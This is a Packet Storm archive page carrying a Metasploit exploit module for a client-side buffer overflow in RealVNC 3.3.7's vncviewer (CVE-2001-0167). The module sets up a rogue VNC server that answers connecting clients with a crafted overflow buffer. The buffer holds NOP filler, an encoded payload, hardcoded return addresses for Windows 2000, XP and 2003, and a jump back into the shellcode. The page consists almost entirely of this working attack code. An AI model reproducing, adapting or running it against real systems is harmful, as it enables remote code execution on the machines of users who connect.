exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

RealVNC 3.3.7 Client Buffer Overflow

RealVNC 3.3.7 Client Buffer Overflow
Posted Nov 26, 2009
Authored by MC | Site metasploit.com

This Metasploit module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).

tags | exploit, overflow
advisories | CVE-2001-0167
SHA-256 | 7abfb4c3caf1989bb16c211ecea2c6ffbe68fa736684d4d97e97452aa567b5bd

RealVNC 3.3.7 Client Buffer Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##



class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::TcpServer

def initialize(info = {})
super(update_info(info,
'Name' => 'RealVNC 3.3.7 Client Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2001-0167' ],
[ 'OSVDB', '6281' ],
[ 'BID', '2305' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
'MaxNops' => 0,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 SP4 English', { 'Ret' => 0x7c2ec68b } ],
[ 'Windows XP SP2 English', { 'Ret' => 0x77dc15c0 } ],
[ 'Windows 2003 SP1 English', { 'Ret' => 0x76aa679b } ],
],
'Privileged' => false,
'DisclosureDate' => 'Jan 29 2001',
'DefaultTarget' => 0))

register_options(
[
OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
], self.class)
end

def on_client_connect(client)

rfb = "RFB 003.003\n"

client.put(rfb)
end

def on_client_data(client)
return if ((p = regenerate_payload(client)) == nil)

filler = make_nops(993 - payload.encoded.length)

sploit = "\x00\x00\x00\x00\x00\x00\x04\x06" + filler + payload.encoded
sploit << [target.ret].pack('V') + make_nops(10) + [0xe8, -457].pack('CV')
sploit << rand_text_english(200)

print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
client.put(sploit)

handler
service.close_client(client)
end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close